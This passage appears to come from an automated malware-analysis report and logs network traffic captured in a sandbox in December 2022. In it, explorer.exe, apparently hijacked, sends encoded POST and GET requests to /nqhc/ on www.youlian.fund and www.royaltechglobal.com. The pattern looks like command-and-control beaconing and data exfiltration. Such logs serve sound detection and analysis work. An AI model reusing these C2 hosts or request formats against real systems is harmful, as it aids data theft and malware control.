                                                                                                                                                                          Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 6e 34 57 6e 49 47 34 4a 6e 41 58 7a 31 77 35 44 51 34 6b 73 72 68 32 4d 43 38 48 4e 53 41 55 74 4e 70 4f 31 4d 52 4a 78 6c 72 45 43 5f 4d 46 62 35 41 6f 35 64 59 53 42 4b 4e 6a 46 79 71 6a 48 6b 4b 77 4a 43 32 59 34 4e 64 6e 35 36 78 6f 74 6c 72 47 4c 79 45 35 6a 78 46 58 62 52 58 44 39 65 4c 59 31 50 6d 41 45 71 4e 30 5a 38 36 43 72 72 43 42 63 74 28 67 64 2d 61 4e 56 33 76 6e 32 79 59 39 6a 74 44 6a 66 49 4b 70 4f 73 52 78 73 6e 31 4d 6a 6a 43 78 45 6b 54 58 43 44 34 52 31 35 51 32 78 4c 7e 79 6c 54 48 48 36 53 58 79 67 54 50 42 74 73 44 30 6e 4b 4a 77 70 57 74 70 54 6a 74 56 61 6d 7a 5a 54 78 39 51 4a 66 32 62 4c 6a 68 55 48 6b 56 45 71 66 35 5f 62 36 72 54 6e 41 33 35 53 73 34 4f 57 44 45 48 74 78 61 71 79 6e 73 75 7a 73 36 52 70 49 4b 58 4f 49 31 41 35 61 4f 69 75 48 54 32 68 57 52 66 70 68 54 75 4e 6f 33 44 71 43 5a 6f 49 56 6d 76 56 39 74 35 78 73 70 67 7a 65 46 33 73 39 50 6e 72 36 43 35 67 67 63 6a 32 48 34 4b 6a 78 33 48 66 51 63 6d 74 34 4e 76 31 72 49 77 79 42 33 36 32 42 31 4c 48 47 67 79 79 4f 62 55 31 35 51 61 77 43 74 4d 4f 63 4f 47 62 50 31 72 52 62 45 31 4f 52 48 5a 6b 63 54 4e 45 77 51 34 58 58 46 63 36 58 62 4c 7a 63 71 79 42 55 49 44 31 65 37 59 43 63 6c 54 28 53 4e 35 6b 34 66 56 37 73 4c 31 77 35 76 4e 54 35 6b 75 45 6e 37 4e 79 46 33 73 54 30 28 73 61 47 6c 66 62 33 72 62 4f 55 43 34 4b 44 35 77 35 51 58 74 34 77 49 69 43 44 31 72 76 74 67 69 79 50 51 68 54 39 75 6c 54 62 76 36 78 6b 43 6b 67 44 4a 30 62 42 41 6d 7a 44 77 54 56 51 6a 72 28 55 4a 6d 7e 33 51 75 67 77 55 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSAUtNpO1MRJxlrEC_MFb5Ao5dYSBKNjFyqjHkKwJC2Y4Ndn56xotlrGLyE5jxFXbRXD9eLY1PmAEqN0Z86CrrCBct(gd-aNV3vn2yY9jtDjfIKpOsRxsn1MjjCxEkTXCD4R15Q2xL~ylTHH6SXygTPBtsD0nKJwpWtpTjtVamzZTx9QJf2bLjhUHkVEqf5_b6rTnA35Ss4OWDEHtxaqynsuzs6RpIKXOI1A5aOiuHT2hWRfphTuNo3DqCZoIVmvV9t5xspgzeF3s9Pnr6C5ggcj2H4Kjx3HfQcmt4Nv1rIwyB362B1LHGgyyObU15QawCtMOcOGbP1rRbE1ORHZkcTNEwQ4XXFc6XbLzcqyBUID1e7YCclT(SN5k4fV7sL1w5vNT5kuEn7NyF3sT0(saGlfb3rbOUC4KD5w5QXt4wIiCD1rvtgiyPQhT9ulTbv6xkCkgDJ0bBAmzDwTVQjr(UJm~3QugwU.
                                                                                                                                                                          Dec 5, 2022 15:18:31.972896099 CET12277INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:31 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0
                                                                                                                                                                          Dec 5, 2022 15:18:32.200808048 CET12278INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          62192.168.11.2049907154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:33.937452078 CET12291OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.youlian.fund
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.youlian.fund
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 6e 34 57 6e 49 47 34 4a 6e 41 58 7a 31 77 35 44 51 34 6b 73 72 68 32 4d 43 38 48 4e 53 49 55 74 37 31 4f 31 74 52 4a 79 6c 72 45 42 5f 4d 41 62 35 41 6c 35 65 6f 57 42 4b 52 7a 46 30 32 6a 48 33 79 77 4a 78 65 59 6f 64 64 69 32 61 78 75 70 6c 72 53 4c 79 59 74 6a 79 35 74 62 68 54 44 38 65 37 59 78 38 4f 44 47 36 4e 32 5a 38 37 4e 68 37 43 5f 63 74 37 4b 64 2d 57 4e 56 31 72 6e 33 41 51 39 76 65 62 6a 57 34 4b 75 46 4d 52 30 33 58 30 32 6a 6a 47 62 45 6b 54 48 43 43 38 52 31 36 49 32 7e 71 7e 78 72 54 48 48 7a 79 58 78 6b 54 54 4e 74 73 76 73 6e 4b 56 77 70 57 46 70 51 44 74 56 63 43 6e 65 44 42 38 62 66 76 33 44 64 54 38 62 48 6b 78 36 71 65 4e 5f 59 4b 76 54 6b 58 6a 35 55 49 4d 4f 65 44 45 46 70 78 61 35 6f 58 73 79 7a 6f 6d 6e 70 49 71 39 4f 4f 31 41 34 37 75 69 71 57 54 78 6d 32 52 56 6c 42 54 5f 4a 6f 37 50 71 43 4a 30 49 56 6d 42 56 38 70 35 77 63 35 67 79 66 46 32 68 4e 50 65 67 61 43 57 79 67 59 70 32 48 55 53 6a 78 50 70 66 54 77 6d 74 59 4e 76 6e 38 55 7a 67 52 33 78 72 78 30 57 5a 32 68 77 79 4f 47 46 31 34 45 4b 77 53 42 4d 50 73 65 47 4b 50 31 30 42 72 45 78 59 68 48 66 67 63 54 4e 45 77 63 47 58 58 42 63 37 6e 7a 4c 68 62 57 79 46 48 51 44 33 65 37 6b 43 63 6c 4f 28 53 41 5a 6b 34 47 30 37 74 36 75 77 5f 50 4e 54 49 30 75 46 6d 37 4d 33 31 32 6d 58 30 28 42 58 6d 68 49 62 30 65 59 4f 55 54 46 4b 30 70 77 34 51 48 74 76 41 49 68 4a 44 30 6a 6f 74 68 33 32 50 73 48 54 39 79 66 54 65 54 71 78 6a 32 6b 69 30 4d 76 4b 7a 38 64 68 53 41 52 54 57 48 61 34 7a 78 47 70 48 55 58 7e 32 33 64 49 5a 46 58 59 6b 67 5a 48 42 49 77 4c 2d 39 58 56 30 6f 36 50 59 6c 31 64 53 58 6f 49 7a 56 62 5a 35 76 75 76 70 5a 61 52 64 4f 6e 43 67 59 42 49 49 51 37 38 54 4e 67 4a 6c 66 45 77 34 6e 44 71 42 49 33 43 41 65 6f 74 2d 71 51 65 42 66 37 72 42 42 6e 39 6a 56 33 43 57 61 71 32 49 78 6e 4e 6b 28 57 64 50 4b 33 47 5f 72 4a 58 44 47 47 4e 58 41 32 31 69 59 70 4b 68 61 4c 78 2d 5a 47 4d 44 38 6c 46 6f 76 6f 42 4a 28 61 37 56 6c 65 73 57 6b 6e 66 4f 71 33 79 68 63 4d 33 66 7a 5f 53 55 50 49 52 66 39 56 6e 59 65 55 79 52 4b 44 45 43 56 75 65 39 45 32 6c 39 4f 77 62 75 46 49 43 57 39 4e 4e 58 73 5f 48 6b 4c 2d 7a 33 49 32 64 32 6f 53 30 62 73 63 7a 2d 52 68 6d 6d 6a 66 72 51 68 41 52 49 41 47 51 64 46 6f 56 76 56 71 72 4c 67 49 47 4a 61 73 75 32 5a 4a 41 49 6c 56 28 6c 6c 49 53 70 6b 54 56 48 45 57 57 67 41 4e 69 37 66 68 54 6b 4c 74 41 58 76 32 30 72 65 66 59 50 4b 47 44 6c 4b 6b 31 4e 61 46 71 43 6a 70 6b 70 73 4b 66 74 6c 4f 6c 55 6f 5f 42 57 4c 5f 4b 4c 4d 65 6e 4f 7e 57 56 61 66 6f 4a 31 37 4f 39 75 72 38 30 73 49 5f 6d 7a 57 45 7a 7a 54 43 52 43 55 68 41 4e 30 33 71 4f 67 35 72 65 62 4b 43 35 74 78 77 69 36 4a 46 62 65 6a 4f 54 6d 4c 55 4c 4b 6c 48 53 50 74 7a 41 6a 42 65 70 66 45 36 4f 6f 76 28 54 33 57 67 42 48 47 35 74 43 4d 74 48 34 39 51 4b 6a 6c 66 34 61 56 52 38 4c 51 66 4f 45 6b 37 56 76 74 6f 45 63 67 51 7a 6a 46 70 55 4a 55 4c 35 42 76 36 67 75 69 45 4b 4c 74 55 48 42 71 56 6b 63 44 33 30 5a 75 35 56 38 6f 6a 69 79 69 7a 71 43 56 39 5f 7a 61 42 57 52 68 4c 54 58 53 6c 70 77 42 37 34 50 2d 70 43 55 55 31 4d 44 79 52 36 46 4f 79 65 4c 54 46 68 7a 55 70 62 4c 5a 62 51 69 2d 61 41 41 66 57 68 42 4d 43 47 56 65 72 7a 32 59 6a 33 52 47 28 33 51 4d 62 35 6b 30 55 73 58 52 56 6f 50 38 72 74 51 65 53 45 46 53 32 37 7a 77 77 55 77 44 45 36 7a 36 70 75 41 4a 6e 66 49 79 56 47 72 31 61 35 35 44 36 4d 28 59 42 46 49 37 50 66 6b 59 75 57 49 5a 36 4f 4a 73 69 31 66 62 33 72 4b 55 62 57 42 57 7e 58 6b 6a 77 69 6f 32 44 67 72 73 70 5f 72 32 69 54 7e 56 52 6e 41 37 6c 74 67 70 63 68 52 35 32 33 7a 38 56 66 35 53 66 43 41 47 4f 70 35 51 39 45 46 34 6d 67 32 4e 6d 41 30 31 6e 42 77 77 55 46 78 44 48 4b 35 66 55 63 51 48 41 62 33 2d 49 4e 78 62 4e 43 53 49 70 59 5a 46 6d 5f 57 36 35 55 4f 6e 53 54 55 6c 73 79 72 70 78 79 68 51 4c 4a 64 77 55 6f 41 35 6c 37 44 5f 59 57 6f 76 31 30 4e 77 5a 7a 65 4c 44 69 7a 4c 33 49 36 4c 53 6f 33 79 79 37 42 79 45 71 41 34 4b 53 4d 6a 4f 66 51 33 32 50 32 67 41 56 39 69 55 66 61 76 30 50 78 4b 63 6b 62 5a 76 51 50 53 58 52 38 44 4a 6e 30 5a 31
                                                                                                                                                                          Data Ascii: 7nWHV=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSIUt71O1tRJylrEB_MAb5Al5eoWBKRzF02jH3ywJxeYoddi2axuplrSLyYtjy5tbhTD8e7Yx8ODG6N2Z87Nh7C_ct7Kd-WNV1rn3AQ9vebjW4KuFMR03X02jjGbEkTHCC8R16I2~q~xrTHHzyXxkTTNtsvsnKVwpWFpQDtVcCneDB8bfv3DdT8bHkx6qeN_YKvTkXj5UIMOeDEFpxa5oXsyzomnpIq9OO1A47uiqWTxm2RVlBT_Jo7PqCJ0IVmBV8p5wc5gyfF2hNPegaCWygYp2HUSjxPpfTwmtYNvn8UzgR3xrx0WZ2hwyOGF14EKwSBMPseGKP10BrExYhHfgcTNEwcGXXBc7nzLhbWyFHQD3e7kCclO(SAZk4G07t6uw_PNTI0uFm7M312mX0(BXmhIb0eYOUTFK0pw4QHtvAIhJD0joth32PsHT9yfTeTqxj2ki0MvKz8dhSARTWHa4zxGpHUX~23dIZFXYkgZHBIwL-9XV0o6PYl1dSXoIzVbZ5vuvpZaRdOnCgYBIIQ78TNgJlfEw4nDqBI3CAeot-qQeBf7rBBn9jV3CWaq2IxnNk(WdPK3G_rJXDGGNXA21iYpKhaLx-ZGMD8lFovoBJ(a7VlesWknfOq3yhcM3fz_SUPIRf9VnYeUyRKDECVue9E2l9OwbuFICW9NNXs_HkL-z3I2d2oS0bscz-RhmmjfrQhARIAGQdFoVvVqrLgIGJasu2ZJAIlV(llISpkTVHEWWgANi7fhTkLtAXv20refYPKGDlKk1NaFqCjpkpsKftlOlUo_BWL_KLMenO~WVafoJ17O9ur80sI_mzWEzzTCRCUhAN03qOg5rebKC5txwi6JFbejOTmLULKlHSPtzAjBepfE6Oov(T3WgBHG5tCMtH49QKjlf4aVR8LQfOEk7VvtoEcgQzjFpUJUL5Bv6guiEKLtUHBqVkcD30Zu5V8ojiyizqCV9_zaBWRhLTXSlpwB74P-pCUU1MDyR6FOyeLTFhzUpbLZbQi-aAAfWhBMCGVerz2Yj3RG(3QMb5k0UsXRVoP8rtQeSEFS27zwwUwDE6z6puAJnfIyVGr1a55D6M(YBFI7PfkYuWIZ6OJsi1fb3rKUbWBW~Xkjwio2Dgrsp_r2iT~VRnA7ltgpchR523z8Vf5SfCAGOp5Q9EF4mg2NmA01nBwwUFxDHK5fUcQHAb3-INxbNCSIpYZFm_W65UOnSTUlsyrpxyhQLJdwUoA5l7D_YWov10NwZzeLDizL3I6LSo3yy7ByEqA4KSMjOfQ32P2gAV9iUfav0PxKckbZvQPSXR8DJn0Z1_fX8mXhX5nCY559ZaIsJn7ce5(mbM5eJlVMSFQWqYIh1WSlmuUjit2bPaFoO_ncEoczRiGlNcVZ2DwFDm7IirRvgAPRaHRZuHrfd3hb8F5rYCYCckcKL8Ieezo22AHsUhYgWTy6x4(k47HFVnYI4CLE~y5tDY3PyNGGpvZzqZ32J9QzVPCIuOh4F2f3H3SQ62hIxQymbPyeWv0-qY4WNU5Ek64XUot7Ekxebjxfynp2JviHp2ZJk1c8soRufoD5QRxQB6Ec23UfdaH8L9gjAYr7TXdp35WcSFIOHnT35Y7bJ4mrO6AeK23Wm6xXIfTPeLPA76ZqNKc25eu4TnbS(u9uALKTEe2X4hco~oBrpvSqC6qdvsyDVbGNHe473EnDFXut4N7dL8pg8yXUcqdyoRSJDJ7CrdU5gqNk7vGd1awRaEFzxshbNDlYhzXaeDFq1Y7kg648eqvM58L1r1iK5x0fe3mZGrXUUqrqG1G7fxJjUQcVoTpaZMhb3pBB1yq1Dwzl(kg0sOeshIs1Pm0jHgGHPb7Ot579xxiT14FdOSmKq-(2bPoLfVHv4_~DLzo6hoUAB8xAAhGNzQxcGJxHKAcfoKPyL5pkUndp1ULZXc9FRAIXkLveHxws5f1sr-1A8DOLuFdAm2u1tfhuoXQNM6Bjcr2A4_pkkuXuwcA7wb5A8ohO6C~y6_0byEVXejiMs7BXP8T0U9~vA8wxXt1d6gpXiPnHwH0O1qg7ArlFNUzFyDCi1etthi(9VgUmJuIBSRSPjH(qTTV6BmtH9A3HE_yttbiY4tdzNt(HoQGLXxd1hZAh1h6frQdxjHEx~QhdfwPbl-6z9626OtyuY5q7Un5QgUjdcHb8LshBv3bl9fFO3QaqN8PN8o4okotA5sKw74BA0P(Pcw5zwwk2pZs2m1(GC-b_eB2McpWahOZo76eOxr06aNgLkvBIrZRpKV7ACFUSS73-pjOWZuvuHFa7paHGb-NMzNg9gWkNVMi9T9fdPD0qQQ7fnknc46lSNyqshBXWLZqIwNzbF3Vw0F(wJBR-Ef5C45LcoXPZ4XmtqjeG(OCQqfWzY1arjpxDbIRvwCZvz6agq1t09cD49BPPlBIhPTukeypxZIJx(NY55u60M2cDpzpPE6oQv1540b2Bgz32t1w9FMD792qsYtIIum(FkYh2cFcxtsV9cC3puWyuBmD1MIlnihTCS_3z6y1y8xBYiTnsek4kzgEjtHiwbRY6yrKWU2lwSKM3Lkk0BdG4sVdh4VQMxAOmHxF5Rd8RZtqIuQCH1YdMus~wIrRR(BbJWk0G4U1rMASIxuKj9MJt9AWTJ9vtOgiWhuS-0chk7k44I-kG7IPTd9Hze3g9eAglZl5oiaV_MC7giGwETETEEa0hgzpxclahmFZRrOo6F-L7Icowb9JuLw7w2wHL2OxTri~siHeRar5Sne6366BNFGV-gtzv2Gai3Lb4tWtj~J(Fhq24ysgjEMfByDNGe5Ph(rQzcmNv8gRAQbpFqpsrv6i0mgXLKESjcXxNvkxdl9lFQhJ5AvRPnQ0aqDYBHDR9ccJP7FxpdIRJq_ZpXDjI8tjwfQEHxrw9iD5FJkSztHwDFbvKllvHRpO4ACW7iEyvCvO3dl5ZMZuEJF9xSoq_vKr26ILKA88Ytzz0vxayJUjELhOvGqaY5ODKbM6R7-I1ZeqO3h6MVYvYYTF1IRw3(aZq6HVM6DGRmI1EPNVwwoIvUJzB1maX~a~CIbi3gF0hZEtgzPVSyQGRtRpH0fDCtCnqGYdkjFGUgRtohoEZMo67AWwqeaiBJUrd32ylos8ckQMSQ7AnZ5onkMdoFBrjjfSNEqzPJ6hfENSriqhfq_DQAvMsR03M6aoLIIHrOWoc(5SL8pzlymv-VSrxJ0TmwkkANy2xd1eYONnlpkfzMKVAV9hNmPwJzfjmlqM0Bm9fzAGoo7SxYCBAslBKVB73D5SkVdnTshbG8KLAU3I9iCIpHcZ2OCjHC4Dgb1EHCwbnKH~X3rkyx7kyoWDA9zsuie0yRnMY6y9MeoGaaF5c59~OWPUynsFama91RRRNK68ShFjRMvHvAu~h93WQyZpVLyNT7W~Z3hpQ8M5gGFK7NRIeuvuXhKz3ccBlFhHN(UPN5_EYzpGs3I59svdoQgDdDxZDe0JJgWq0~LgJ2_6NjWOeG1NXpE(Cp1AtHhcNTFX4KaGgZ8d5h_4letagomdcBUA9G-POqdVUQqDlytB1r-PmlbRzdRsUiri3Sq2Qyy9U1_tUnx1GMZR5yo38FFG3sLiEoBWpvrE9Q26kR6UumEsubx1f99ZzfPncifLRjLyArfy7(hOwPRwgDxMPuZ4OBuS257W67RnHGoBD2m8s930VWhM4mOpDD87f~HaJE7dlHLiWvFC3r1W_OVhpH3sRQipRd5xkXoJxHbZ2iRKINZilbddNIx0UARXLQFIReYDVmrB2KSq9IIJHdU4NvLhRC_9xd-q_lUFJPQIPC5eII9JTHBf30cv2EwQ0fE3xbWVojiYmXM0rKbR7etbLN4CLq_431txCSUjSTLdvXBIG0kX6khU-k1g1x8iWpQjx(DV_CSYMerKs(lXhxH~bN1xNwQg_kbaRUTr6TAEMIjEY4BMJyOJM(lrgD9XxpnhSp-c3J_NEn1CZVCZzURZCCh23U3WgL6d8NwKOFsQONbDzd8iH95DFUhyeuVO-uyfpXiN3VasmTz8TXO52
                                                                                                                                                                          Dec 5, 2022 15:18:34.218924999 CET12292OUTData Raw: 65 4a 58 37 39 54 62 31 62 72 38 45 75 5a 56 71 4c 6a 31 63 68 33 7e 34 59 7a 4e 5a 69 51 63 49 50 39 63 78 49 31 65 7a 63 43 77 57 64 4d 31 79 75 53 74 54 47 30 78 59 32 55 44 41 79 6b 79 6c 34 43 7a 44 73 6b 79 6f 66 76 67 53 5a 54 72 6d 4e 6b
                                                                                                                                                                          Data Ascii: eJX79Tb1br8EuZVqLj1ch3~4YzNZiQcIP9cxI1ezcCwWdM1yuStTG0xY2UDAykyl4CzDskyofvgSZTrmNk6AVmtpz_huGvMC7Kpr~zqmyH0ZJaBJX6bHExgBRquDxKdda_xfl_LEZRgR83QDXjzbEhnXjB4rAqmDTKdrL0oUQW4k81tfNqIh4DgBLW9ZX8Ei4PAokm0Iq-3exfcubUtJbsX66C8MjMFSa0NCViQflvvqTmK9zJy
                                                                                                                                                                          Dec 5, 2022 15:18:34.219079971 CET12298OUTData Raw: 4a 66 39 54 58 6f 4e 63 62 4e 53 4c 5a 65 47 55 6e 6d 67 51 41 70 70 4e 7a 44 69 59 57 38 76 44 52 47 4e 58 44 4e 4a 46 54 70 71 30 47 52 28 6e 66 54 4a 69 58 6e 41 4c 43 51 52 38 62 7a 75 63 61 5f 45 71 77 73 4e 37 79 77 4f 37 6b 54 30 4c 65 69
                                                                                                                                                                          Data Ascii: Jf9TXoNcbNSLZeGUnmgQAppNzDiYW8vDRGNXDNJFTpq0GR(nfTJiXnALCQR8bzuca_EqwsN7ywO7kT0Leih_7oLssDrHyqnO4pUVJkrk2jpTwCN0ZvXhRJzstSIpivc0xEylgoIcp97Fkh3om0f8gGSTZ6LWKTRBrUzY6WDHXMoYqiOWIvL4bAVopuimTvMleQigKnMGtkXgxqkEDSi-Qugc(bXzq3c7SJqo1a71EkMs9aPleHm
                                                                                                                                                                          Dec 5, 2022 15:18:34.219621897 CET12306OUTData Raw: 61 64 6f 69 35 34 44 43 4e 33 5a 4c 6d 72 63 6a 71 38 33 71 28 71 28 4e 30 30 54 51 4b 55 72 31 6d 43 5a 41 54 50 52 67 31 79 64 61 6c 48 39 32 73 4e 67 44 6f 78 4c 73 76 43 34 71 58 6e 36 45 75 2d 62 4f 6f 4e 78 53 61 55 43 77 37 48 62 50 6d 2d
                                                                                                                                                                          Data Ascii: adoi54DCN3ZLmrcjq83q(q(N00TQKUr1mCZATPRg1ydalH92sNgDoxLsvC4qXn6Eu-bOoNxSaUCw7HbPm-4uhprVQqfRVQCCBmOXSjrkz06WmzQGZGcR6GxdlYdxlKx9g3KN9_j6BV6jF-33N_PKyohYb69cWiQyl2025wmUCFVYMEtzg-bbeIfuRdl1QmyPiGiah07A6EPo(A7_drBDmoyUD6EciDE8ohe7OflacF4-ufEpddn
                                                                                                                                                                          Dec 5, 2022 15:18:34.219805002 CET12315OUTData Raw: 4b 74 6e 6c 32 6d 65 72 41 61 6f 39 30 52 69 4e 67 78 4b 54 55 45 37 41 39 59 42 5f 39 78 6d 68 78 4b 37 65 62 31 43 4a 7a 67 34 53 4a 58 61 53 52 4f 42 51 68 48 67 48 37 4d 7e 55 33 6a 51 64 4a 48 48 6a 46 57 36 4a 62 70 6a 64 39 4c 71 55 42 65
                                                                                                                                                                          Data Ascii: Ktnl2merAao90RiNgxKTUE7A9YB_9xmhxK7eb1CJzg4SJXaSROBQhHgH7M~U3jQdJHHjFW6Jbpjd9LqUBeYfZoIG0R520TcfUBbs0IAo(EJNzYPqfkTx6AN4IChJfj4tleyHnIs7DicIlrmUbHV9xdhlwCeITqEh~Evna47Cf5YI95MzSUlNUKlq4HHMwJPIS8(oU4kR(Wsj~KheOOATg2r21i~XwexIRpD65JdQTL5fy8pQw7U
                                                                                                                                                                          Dec 5, 2022 15:18:34.219916105 CET12317OUTData Raw: 4d 6b 31 6a 44 45 4a 6c 28 31 70 6f 4e 77 43 71 57 49 6f 4c 48 35 6c 30 6b 49 37 73 69 62 53 4c 6f 6e 71 35 6a 4f 28 6f 4b 54 62 50 4f 68 6e 61 44 49 56 67 6f 69 4a 7a 45 4d 45 56 4c 4d 67 39 36 32 68 6a 71 6f 78 73 37 75 6e 30 63 55 79 35 48 39
                                                                                                                                                                          Data Ascii: Mk1jDEJl(1poNwCqWIoLH5l0kI7sibSLonq5jO(oKTbPOhnaDIVgoiJzEMEVLMg962hjqoxs7un0cUy5H9o_S0UB4u4IkjSL982aG2jeXa7kFMly9Xt03Av_96gtuCU2aPfWmgxZMfG_uiRrHqQFPYYEM28487Z9WXN6iwBfhN~x6uJ4H37DSL2ziT0VTXI3Z9AYVRIElM(55wWGkTiAKj5pH5AnhxJ_Zh90KirPjrSP6OV_9O4
                                                                                                                                                                          Dec 5, 2022 15:18:34.500874043 CET12322OUTData Raw: 4f 76 61 44 70 6d 53 78 4c 58 54 71 58 32 79 44 48 41 70 36 30 45 47 31 4b 7a 30 43 71 32 30 53 32 56 44 66 30 53 70 67 7a 56 7a 65 58 70 55 50 67 39 47 79 70 58 69 79 4d 6e 31 77 73 47 48 6a 62 41 73 4e 65 75 51 73 7a 4e 33 33 7a 79 59 51 45 36
                                                                                                                                                                          Data Ascii: OvaDpmSxLXTqX2yDHAp60EG1Kz0Cq20S2VDf0SpgzVzeXpUPg9GypXiyMn1wsGHjbAsNeuQszN33zyYQE63dWy5aRC0TZ4cu1WJrbZHmHPFrtFJJT7C1El2O47bpeG0mxBeBDMgmvIwRw6tDQ5Q2xA7MnnA9OkpsUn3puzXfLdT3Q4L7yUgGVPEP3eUhU6WduozFPSUDGy(8dpHpzAegKYEXAH(WPvnNKx1x2ODNYxTP~A13hOq
                                                                                                                                                                          Dec 5, 2022 15:18:34.501000881 CET12330OUTData Raw: 72 34 37 71 34 30 75 54 56 63 36 4f 69 43 4a 49 4d 76 39 63 66 35 61 6d 28 77 6b 33 58 6d 46 32 61 68 32 66 57 79 45 65 6d 70 63 6b 37 47 52 5a 7e 45 68 68 46 54 6c 2d 69 4a 78 50 4d 65 6a 79 5a 38 72 79 55 4a 73 6d 72 36 72 33 7e 30 62 34 54 33
                                                                                                                                                                          Data Ascii: r47q40uTVc6OiCJIMv9cf5am(wk3XmF2ah2fWyEempck7GRZ~EhhFTl-iJxPMejyZ8ryUJsmr6r3~0b4T3vgqq79mC9wCZSBla(Wdv(GUF85na1qaD(jebMJvbZhcS37W3DkJx0P3rStekwlJeeDZuRMTTtaSYjOhxldaxIBUl9gy98iOhi6QHmA8AhRkphxs2cIJJOZ8F0U5gm363PuaEuQIBoR6EBKAxWUxyFPD0upEAiGB1u
                                                                                                                                                                          Dec 5, 2022 15:18:34.863331079 CET12332INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:34 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0
                                                                                                                                                                          Dec 5, 2022 15:18:35.112493992 CET12332INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          63192.168.11.2049908154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:36.249335051 CET12333OUTGET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.youlian.fund
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:18:36.535110950 CET12333INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:36 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 1.0
                                                                                                                                                                          Dec 5, 2022 15:18:36.775965929 CET12333INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          64192.168.11.2049909192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:41.658643007 CET12334OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 7a 47 33 66 35 68 71 30 38 6c 61 6d 77 54 76 44 61 52 38 75 68 76 6e 45 6f 57 6b 63 73 68 7e 34 67 78 35 64 39 38 46 54 59 35 68 79 65 75 33 75 78 2d 45 78 58 73 6e 69 4a 47 31 68 62 35 6f 35 74 58 44 6d 35 54 67 49 38 36 61 65 50 32 6f 6d 6f 73 68 5a 49 70 39 47 72 49 38 42 48 44 74 47 6c 68 47 71 70 34 51 65 4f 31 79 59 7a 68 6e 34 37 47 4f 49 44 50 59 4a 6b 37 34 31 68 69 6f 45 75 39 54 37 5a 4f 7a 53 31 7a 6d 39 47 79 66 31 4e 50 68 71 6b 6f 7a 70 47 4e 34 76 42 6a 33 72 4c 5f 33 4b 64 77 29 2e 00 00 00 00 00 00 00 00
